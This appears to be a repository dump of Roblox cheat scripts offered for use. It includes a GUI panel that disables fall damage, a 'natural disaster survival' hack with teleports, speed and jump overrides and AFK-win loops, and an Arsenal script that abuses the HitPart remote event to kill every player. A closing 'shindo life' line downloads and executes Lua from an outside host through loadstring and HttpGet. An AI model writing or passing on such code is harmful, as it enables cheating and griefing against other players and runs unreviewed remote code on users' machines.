621 | game.Players.LocalPlayer.Character.FallDamageScript:Destroy() 622 | else 623 | script.Parent.Text = "Chhar Reset required..." 624 | script.Parent.TextColor3 = colors.Red.Value 625 | sounds.Confirm:Play() 626 | wait(2) 627 | script.Parent.Text = "Fall Damage Disabled" 628 | script.Parent.TextColor3 = colors.Green.Value 629 | end 630 | 631 | end 632 | 633 | game.Players.LocalPlayer.CharacterAdded:connect(function() 634 | script.Parent.Text = "Disable Fall Damage" 635 | --script.Parent.Storage:ClearAllChildren() 636 | actv = false 637 | script.Parent.LghtBr.BackgroundColor3 = colors.White.Value 638 | script.Parent.TextColor3 = colors.White.Value 639 | end) 640 | Button.MouseButton1Click:connect(onClick) 641 | end)) 642 | Folder41.Name = "Storage" 643 | Folder41.Parent = TextButton39 644 | Frame42.Name = "LghtBr" 645 | Frame42.Parent = TextButton39 646 | Frame42.Position = UDim2.new(0.949999988, 0, 0, 0) 647 | Frame42.Size = UDim2.new(0.0500000007, 0, 1, 0) 648 | Frame42.BackgroundColor = BrickColor.new("Institutional white") 649 | Frame42.BackgroundColor3 = Color3.new(1, 1, 1) 650 | Frame42.BorderSizePixel = 0 651 | TextButton43.Name = "OpenButton" 652 | TextButton43.Parent = ScreenGui0 653 | TextButton43.Position = UDim2.new(0, 0, 0.800000012, 0) 654 | TextButton43.Size = UDim2.new(0, 80, 0, 40) 655 | TextButton43.BackgroundColor = BrickColor.new("Black") 656 | TextButton43.BackgroundColor3 = Color3.new(0.196078, 0.196078, 0.196078) 657 | TextButton43.BorderSizePixel = 0 658 | TextButton43.Font = Enum.Font.SourceSans 659 | TextButton43.FontSize = Enum.FontSize.Size14 660 | TextButton43.Text = "Toggle UI" 661 | TextButton43.TextColor = BrickColor.new("Institutional white") 662 | TextButton43.TextColor3 = Color3.new(1, 1, 1) 663 | TextButton43.TextSize = 14 664 | LocalScript44.Parent = TextButton43 665 | table.insert(cors,sandbox(LocalScript44,function() 666 | local Button = script.Parent 667 | Frame = script.Parent.Parent.Panel 668 | Openb = script.Parent 669 | 670 | function onClick() 671 | script.Parent.Parent.Panel.Sounds.Click:Play() 672 | if Frame.Visible == false then 673 | Frame.Visible = true 674 | elseif Frame.Visible == true then 675 | Frame.Visible = false 676 | end 677 | end 678 | 679 | 680 | Button.MouseButton1Click:connect(onClick) 681 | 682 | local Bttn = Enum.KeyCode.Equals 683 | game:GetService("UserInputService").InputBegan:connect(function(inputObject) 684 | if inputObject.KeyCode == Bttn then 685 | script.Parent.Parent.Panel.Sounds.Click:Play() 686 | if Frame.Visible == false then 687 | Frame.Visible = true 688 | elseif Frame.Visible == true then 689 | Frame.Visible = false 690 | end 691 | end 692 | end) 693 | end)) 694 | LocalScript45.Name = "mngr" 695 | LocalScript45.Parent = TextButton43 696 | table.insert(cors,sandbox(LocalScript45,function() 697 | Panel = script.Parent.Parent.Panel 698 | OpnB = script.Parent 699 | 700 | while wait(.3) do 701 | if Panel.Visible==true then 702 | OpnB.Visible=false 703 | else 704 | OpnB.Visible=true 705 | end 706 | end 707 | end)) 708 | ImageLabel46.Parent = TextButton43 709 | ImageLabel46.Position = UDim2.new(0, 80, 0, 0) 710 | ImageLabel46.Size = UDim2.new(0, 40, 0, 40) 711 | ImageLabel46.BackgroundColor = BrickColor.new("Black") 712 | ImageLabel46.BackgroundColor3 = Color3.new(0.196078, 0.196078, 0.196078) 713 | ImageLabel46.BorderSizePixel = 0 714 | ImageLabel46.Image = "rbxassetid://2583751738" 715 | ImageLabel46.ScaleType = Enum.ScaleType.Fit 716 | Frame47.Name = "AlertPnl" 717 | Frame47.Parent = ScreenGui0 718 | Frame47.Position = UDim2.new(0.349999994, 0, -0.300000012, 0) 719 | Frame47.Size = UDim2.new(0.300000012, 0, 0.100000001, 0) 720 | Frame47.BackgroundColor = BrickColor.new("Black") 721 | Frame47.BackgroundColor3 = Color3.new(0.196078, 0.196078, 0.196078) 722 | Frame47.BorderSizePixel = 0 723 | Frame48.Name = "LightBar" 724 | Frame48.Parent = Frame47 725 | Frame48.Position = UDim2.new(0, 0, 0.899999976, 0) 726 | Frame48.Size = UDim2.new(1, 0, 0.100000001, 0) 727 | Frame48.BackgroundColor = BrickColor.new("Institutional white") 728 | Frame48.BackgroundColor3 = Color3.new(1, 1, 1) 729 | Frame48.BorderSizePixel = 0 730 | TextLabel49.Name = "Text" 731 | TextLabel49.Parent = Frame47 732 | TextLabel49.Size = UDim2.new(1, 0, 0.899999976, 0) 733 | TextLabel49.BackgroundColor = BrickColor.new("Institutional white") 734 | TextLabel49.BackgroundColor3 = Color3.new(1, 1, 1) 735 | TextLabel49.BackgroundTransparency = 1 736 | TextLabel49.Font = Enum.Font.Highway 737 | TextLabel49.FontSize = Enum.FontSize.Size24 738 | TextLabel49.Text = "nil" 739 | TextLabel49.TextColor = BrickColor.new("Institutional white") 740 | TextLabel49.TextColor3 = Color3.new(1, 1, 1) 741 | TextLabel49.TextSize = 20 742 | TextLabel49.TextWrap = true 743 | TextLabel49.TextWrapped = true 744 | LocalScript50.Name = "Controller" 745 | LocalScript50.Parent = Frame47 746 | table.insert(cors,sandbox(LocalScript50,function() 747 | --Pointers 748 | colors = script.Parent.Colors 749 | txt = script.Parent.Text 750 | Lghtbr = script.Parent.LightBar 751 | uiFrm = script.Parent 752 | inTxt = script.Parent.InputText 753 | 754 | --Functions 755 | function BlnkRed() 756 | for i = 1,5 do 757 | Lghtbr.BackgroundColor3 = colors.Red.Value 758 | script.Parent.Parent.Panel.SBar.BackgroundColor3 = colors.Red.Value 759 | wait(.5) 760 | Lghtbr.BackgroundColor3 = colors.White.Value 761 | script.Parent.Parent.Panel.SBar.BackgroundColor3 = colors.White.Value 762 | wait(.5) 763 | end 764 | end 765 | 766 | function BlnkYllw() 767 | for i = 1,5 do 768 | Lghtbr.BackgroundColor3 = colors.Yellow.Value 769 | script.Parent.Parent.Panel.SBar.BackgroundColor3 = colors.Yellow.Value 770 | wait(.5) 771 | Lghtbr.BackgroundColor3 = colors.White.Value 772 | script.Parent.Parent.Panel.SBar.BackgroundColor3 = colors.White.Value 773 | wait(.5) 774 | end 775 | end 776 | 777 | 778 | script.Parent.Activate.Changed:Connect(function() 779 | if script.Parent.Activate.Value == true and script.Parent.Mode.Value == false then 780 | txt.Text = inTxt.Value 781 | uiFrm:TweenPosition(UDim2.new(0.35,0,0,0), "Out", "Quart", .5) 782 | BlnkRed() 783 | wait(1) 784 | uiFrm:TweenPosition(UDim2.new(0.35,0,-0.3,0), "Out", "Quart", 1) 785 | script.Parent.Activate.Value = false 786 | elseif script.Parent.Activate.Value == true and script.Parent.Mode.Value == true then 787 | script.Parent.Mode.Value = false 788 | txt.Text = inTxt.Value 789 | uiFrm:TweenPosition(UDim2.new(0.35,0,0,0), "Out", "Quart", .5) 790 | BlnkYllw() 791 | wait(1) 792 | uiFrm:TweenPosition(UDim2.new(0.35,0,-0.3,0), "Out", "Quart", 1) 793 | script.Parent.Activate.Value = false 794 | elseif script.Parent.Activate.Value == false then 795 | 796 | end 797 | end) 798 | end)) 799 | Folder51.Name = "Colors" 800 | Folder51.Parent = Frame47 801 | Color3Value52.Name = "Red" 802 | Color3Value52.Parent = Folder51 803 | Color3Value52.Value = Color3.new(1, 0, 0) 804 | Color3Value53.Name = "Green" 805 | Color3Value53.Parent = Folder51 806 | Color3Value53.Value = Color3.new(0.156863, 0.6, 0.12549) 807 | Color3Value54.Name = "Yellow" 808 | Color3Value54.Parent = Folder51 809 | Color3Value54.Value = Color3.new(0.956863, 0.87451, 0.258824) 810 | Color3Value55.Name = "White" 811 | Color3Value55.Parent = Folder51 812 | Color3Value55.Value = Color3.new(1, 1, 1) 813 | Color3Value56.Name = "Black" 814 | Color3Value56.Parent = Folder51 815 | Color3Value56.Value = Color3.new(0.105882, 0.164706, 0.207843) 816 | BoolValue57.Name = "Activate" 817 | BoolValue57.Parent = Frame47 818 | StringValue58.Name = "InputText" 819 | StringValue58.Parent = Frame47 820 | StringValue58.Value = "nil" 821 | BoolValue59.Name = "Mode" 822 | BoolValue59.Parent = Frame47 823 | Script60.Name = "Instructions" 824 | Script60.Parent = BoolValue59 825 | table.insert(cors,sandbox(Script60,function() 826 | --[[ 827 | False = Red Alert 828 | True = Yellow Alert 829 | ]] 830 | end)) 831 | Script60.Disabled = true 832 | for i,v in pairs(mas:GetChildren()) do 833 | v.Parent = game:GetService("Players").LocalPlayer.PlayerGui 834 | pcall(function() v:MakeJoints() end) 835 | end 836 | mas:Destroy() 837 | for i,v in pairs(cors) do 838 | spawn(function() 839 | pcall(v) 840 | end) 841 | end 842 | -------------------------------------------------------------------------------- /natural disaster survival old script: -------------------------------------------------------------------------------- 1 | local DisasterHAX = Instance.new("ScreenGui") 2 | local MainUI = Instance.new("Frame") 3 | local name = Instance.new("TextLabel") 4 | local creds = Instance.new("TextLabel") 5 | local TPLobby = Instance.new("TextButton") 6 | 7 | Crazy = Instance.new("TextButton") 8 | local TPMap = Instance.new("TextButton") 9 | local Walkspeed = Instance.new("TextButton") 10 | local AFKWins = Instance.new("TextButton") 11 | local Speedvalue = Instance.new("TextBox") 12 | local Jumpower = Instance.new("TextButton") 13 | local Jumpvalue = Instance.new("TextBox") 14 | local Nofalldamage = Instance.new("TextButton") 15 | 16 | -- Properties 17 | 18 | DisasterHAX.Name = "DisasterHAX" 19 | DisasterHAX.Parent = game.CoreGui 20 | 21 | MainUI.Name = "MainUI" 22 | MainUI.Parent = DisasterHAX 23 | MainUI.BackgroundColor3 = Color3.new(0.435294, 0.435294, 0.435294) 24 | MainUI.Position = UDim2.new(0.612644732, 0, 0.0489642099, 0) 25 | MainUI.Size = UDim2.new(0, 344, 0, 408) 26 | 27 | name.Name = "name" 28 | name.Parent = MainUI 29 | name.BackgroundColor3 = Color3.new(0.6, 0, 0.6) 30 | name.Size = UDim2.new(0, 344, 0, 45) 31 | name.Font = Enum.Font.SciFi 32 | name.Text = "DisasterHax" 33 | name.TextSize = 50 34 | 35 | creds.Name = "creds" 36 | creds.Parent = MainUI 37 | creds.BackgroundColor3 = Color3.new(0.435294, 0.435294, 0.435294) 38 | creds.BorderSizePixel = 0 39 | creds.Position = UDim2.new(0, 0, 0.932153404, 0) 40 | creds.Size = UDim2.new(0, 289, 0, 23) 41 | creds.Font = Enum.Font.SciFi 42 | creds.Text = "Made by Roboguyplayzroblox1" 43 | creds.TextSize = 20 44 | 45 | TPLobby.Name = "TPLobby" 46 | TPLobby.Parent = MainUI 47 | TPLobby.BackgroundColor3 = Color3.new(0.6, 0, 0.6) 48 | TPLobby.Position = UDim2.new(0.0529100522, 0, 0.485391617, 0) 49 | TPLobby.Size = UDim2.new(0, 145, 0, 42) 50 | TPLobby.Font = Enum.Font.SciFi 51 | TPLobby.Text = "Tp to lobby" 52 | TPLobby.TextSize = 20 53 | TPLobby.TextWrapped = true 54 | 55 | Crazy.Name = "Crazy" 56 | Crazy.Parent = MainUI 57 | Crazy.BackgroundColor3 = Color3.new(0.6, 0, 0.6) 58 | Crazy.Position = UDim2.new(0.518518567, 0, 0.485391617, 0) 59 | Crazy.Size = UDim2.new(0, 145, 0, 42) 60 | Crazy.Font = Enum.Font.SciFi 61 | Crazy.Text = "Choose map" 62 | Crazy.TextSize = 20 63 | Crazy.TextWrapped = true 64 | 65 | TPMap.Name = "TPMap" 66 | TPMap.Parent = MainUI 67 | TPMap.BackgroundColor3 = Color3.new(0.6, 0, 0.6) 68 | TPMap.Position = UDim2.new(0.0529100895, 0, 0.63009721, 0) 69 | TPMap.Size = UDim2.new(0, 145, 0, 42) 70 | TPMap.Font = Enum.Font.SciFi 71 | TPMap.Text = "Tp to map" 72 | TPMap.TextSize = 20 73 | TPMap.TextWrapped = true 74 | 75 | Walkspeed.Name = "Walkspeed" 76 | Walkspeed.Parent = MainUI 77 | Walkspeed.BackgroundColor3 = Color3.new(0.6, 0, 0.6) 78 | Walkspeed.Position = UDim2.new(0.0343915336, 0, 0.149574876, 0) 79 | Walkspeed.Size = UDim2.new(0, 121, 0, 42) 80 | Walkspeed.Font = Enum.Font.SciFi 81 | Walkspeed.Text = "Walkspeed" 82 | Walkspeed.TextSize = 20 83 | Walkspeed.TextWrapped = true 84 | 85 | AFKWins.Name = "AFKWins" 86 | AFKWins.Parent = MainUI 87 | AFKWins.BackgroundColor3 = Color3.new(0.6, 0, 0.6) 88 | AFKWins.Position = UDim2.new(0.518257022, 0, 0.630314112, 0) 89 | AFKWins.Size = UDim2.new(0, 145, 0, 42) 90 | AFKWins.Font = Enum.Font.SciFi 91 | AFKWins.Text = "Afk wins" 92 | AFKWins.TextSize = 20 93 | AFKWins.TextWrapped = true 94 | 95 | Speedvalue.Name = "Speedvalue" 96 | Speedvalue.Parent = MainUI 97 | Speedvalue.BackgroundColor3 = Color3.new(0.6, 0, 0.6) 98 | Speedvalue.Position = UDim2.new(0.386474103, 0, 0.149574876, 0) 99 | Speedvalue.Size = UDim2.new(0, 129, 0, 42) 100 | Speedvalue.Font = Enum.Font.SciFi 101 | Speedvalue.Text = "Value" 102 | Speedvalue.TextSize = 16 103 | 104 | Jumpower.Name = "Jumpower" 105 | Jumpower.Parent = MainUI 106 | Jumpower.BackgroundColor3 = Color3.new(0.6, 0, 0.6) 107 | Jumpower.Position = UDim2.new(0.0343915336, 0, 0.278437614, 0) 108 | Jumpower.Size = UDim2.new(0, 121, 0, 42) 109 | Jumpower.Font = Enum.Font.SciFi 110 | Jumpower.Text = "Jumpower" 111 | Jumpower.TextSize = 20 112 | Jumpower.TextWrapped = true 113 | 114 | Jumpvalue.Name = "Jumpvalue" 115 | Jumpvalue.Parent = MainUI 116 | Jumpvalue.BackgroundColor3 = Color3.new(0.6, 0, 0.6) 117 | Jumpvalue.Position = UDim2.new(0.386474073, 0, 0.278437614, 0) 118 | Jumpvalue.Size = UDim2.new(0, 129, 0, 42) 119 | Jumpvalue.Font = Enum.Font.SciFi 120 | Jumpvalue.Text = "Value" 121 | Jumpvalue.TextSize = 16 122 | 123 | Nofalldamage.Name = "Nofalldamage" 124 | Nofalldamage.Parent = MainUI 125 | Nofalldamage.BackgroundColor3 = Color3.new(0.6, 0, 0.6) 126 | Nofalldamage.Position = UDim2.new(0.0618616641, 0, 0.765118003, 0) 127 | Nofalldamage.Size = UDim2.new(0, 145, 0, 42) 128 | Nofalldamage.Font = Enum.Font.SciFi 129 | Nofalldamage.Text = "No fall damage" 130 | Nofalldamage.TextSize = 20 131 | Nofalldamage.TextWrapped = true 132 | 133 | -- local 134 | p = game.Players.LocalPlayer 135 | 136 | 137 | -- draggable 138 | MainUI.Active = true 139 | MainUI.Draggable = true 140 | 141 | 142 | -- Scripts 143 | 144 | Crazy.MouseButton1Click:connect(function() 145 | local id = 1195159620 146 | game:GetObjects('rbxassetid://'..id)[1].Parent=game.Players.LocalPlayer.PlayerGui 147 | 148 | game.Players.LocalPlayer.PlayerGui.NDSMapSelector.Button.LeButton.Disabled = false 149 | print("Select your map") 150 | end) 151 | 152 | AFKWins.MouseButton1Click:connect(function() 153 | while true do 154 | wait(5) 155 | game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-290, 178, 379) 156 | game.Players.LocalPlayer.Character.Humanoid.Jump = true 157 | end 158 | end) 159 | 160 | TPMap.MouseButton1Click:connect(function() 161 | game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(106, 46, 3) 162 | end) 163 | 164 | 165 | TPLobby.MouseButton1Click:connect(function() 166 | game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-290, 178, 379) 167 | end) 168 | 169 | Walkspeed.MouseButton1Click:connect(function() 170 | p.Character.Humanoid.WalkSpeed = Speedvalue.Text 171 | end) 172 | 173 | Jumpower.MouseButton1Click:connect(function() 174 | p.Character.Humanoid.JumpPower = Jumpvalue.Text 175 | end) 176 | 177 | 178 | Nofalldamage.MouseButton1Click:connect(function() 179 | while wait(0.01) do 180 | a = Instance.new("Script", game.Players.LocalPlayer.Character) 181 | a.Name = "CharacterScript" 182 | wait(0.02) 183 | game.Players.LocalPlayer.Character.CharacterScript:Destroy() 184 | end 185 | end) 186 | -------------------------------------------------------------------------------- /press e and everyone dies in arsenal: -------------------------------------------------------------------------------- 1 | game.Players.LocalPlayer:GetMouse().KeyDown:Connect(function(k) 2 | if k == "e" then 3 | local Gun = game.ReplicatedStorage.Weapons:FindFirstChild(game.Players.LocalPlayer.NRPBS.EquippedTool.Value); 4 | local Crit = math.random() > .6 and true or false; 5 | for i,v in pairs(game.Players:GetPlayers()) do 6 | if v and v.Character and v.Character:FindFirstChild("Head") then 7 | local Distance = (game.Players.LocalPlayer.Character.Head.Position - v.Character.Head.Position).magnitude 8 | for i = 1,10 do 9 | game.ReplicatedStorage.Events.HitPart:FireServer(v.Character.Head, 10 | v.Character.Head.Position + Vector3.new(math.random(), math.random(), math.random()), 11 | Gun.Name, 12 | Crit and 2 or 1, 13 | Distance, 14 | Backstab, 15 | Crit, 16 | false, 17 | 1, 18 | false, 19 | Gun.FireRate.Value, 20 | Gun.ReloadTime.Value, 21 | Gun.Ammo.Value, 22 | Gun.StoredAmmo.Value, 23 | Gun.Bullets.Value, 24 | Gun.EquipTime.Value, 25 | Gun.RecoilControl.Value, 26 | Gun.Auto.Value, 27 | Gun['Speed%'].Value, 28 | game.ReplicatedStorage.wkspc.DistributedTime.Value); 29 | end 30 | end 31 | end 32 | end 33 | end) 34 | -------------------------------------------------------------------------------- /shindo life: -------------------------------------------------------------------------------- 1 | loadstring(game:HttpGet("http://killingman107.com/Assasine03/SL2AF.lua", true))() 2 | --------------------------------------------------------------------------------